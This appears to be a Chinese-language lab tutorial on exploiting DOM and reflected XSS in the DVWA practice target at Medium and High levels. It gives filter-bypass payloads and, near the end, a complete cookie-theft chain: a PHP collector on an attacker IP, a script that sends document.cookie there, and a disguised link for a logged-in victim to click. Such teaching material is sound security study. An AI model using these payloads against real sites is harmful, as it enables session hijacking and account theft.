本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
前言:
1,本文基于dvwa靶场以及PHP study进行操作,靶场具体搭建参考上一篇:
xss漏洞(二,xss靶场搭建以及简单利用)
2,设置靶场环境。
将靶场环境设置为Medium(中等的)并保存(后续设置为High等级操作预期一致)。
一,Medium等级。
1,查看源码。
可知,此处过滤<script>,且<select>标签中只能含有<option>``<optgroup>。
2,测试注入点。
直接使用get传参,可以使用hackbar来进行操作,以避免url编码阻碍使用。
本来并不存在china选项,但可以通过hackbar进行修改。
3,开始利用。
http://dvwa:8003/vulnerabilities/xss_d/?default=></option></select><img src=1 onError=alert('hello')>
因为这个等级存在了过滤,所以此处使用报错利用。
<img>标签是将一张图嵌入的意思,src=后跟所嵌入的图片地址,onError=后跟若前面的代码无法执行所进行的操作。
本段代码的整体含义为:插入地址为1的图片,若无法执行(报错),便执行弹窗为‘hello’的操作。此处可将hello更换为其他敏感信息以进行进一步利用。
二,High等级。
直接使用Medium等级的思路是无法成功的,本次便从白盒视角来进行解题。
白盒与黑盒:
白盒是能在接触到源码的情况下进行的渗透活动,能更好的找出漏洞所在。
黑盒是提供很少的条件辅助攻击,有时甚至仅给一域名或ip,最接近真实的网络攻击环境。
分析源码可知,此处仅接受这四个值。
可以在注入的 payload (攻击载荷)中加入注释符 “#”,注释后边的内容不会发送到服务端,但是会被前端代码所执行。
payload:
http://dvwa:8003/vulnerabilities/xss_d/?default=English%20#%3Cscript%3Ealert('hello')%3C/script%3E
此处不知道为什么,hackbar无法进行注入,只好直接在url栏内进行修改传参。
三,xss漏洞危害及利用。
1,危害:
假如dvwa是你常用的网站,并且已经登录,你不知道此页面存在xss注入,黑客利用xss漏洞获取你cookie.他先打开此网站,构造了恶意语句,然后拿到URL,把URL进行包装,最后发给受害者你,你作为受害者一点击,自己的cookie就发送到了黑客特定的的文件里,黑客就拿到了你的cookie。
2,实例:
①攻击者在在攻击机网站目录下写cookie.php文件。
内容为:
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>②,构造恶意语句,注入dvwa。
payload:
<script>document.write('<img src="http:// 192.168.31.203/cookie.php?cookie='+document.cookie+'">');</script>其中的 192.168.31.203,为攻击机的IP。
③,开始攻击。
生成恶意链接,伪装之后给别人,让别人点击,前提是别人登录了dvwa.
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>document.write('<img src="http://192.168.31.203/cookie.php?cookie='+document.cookie+'">');</script>#受害者点击后:
)
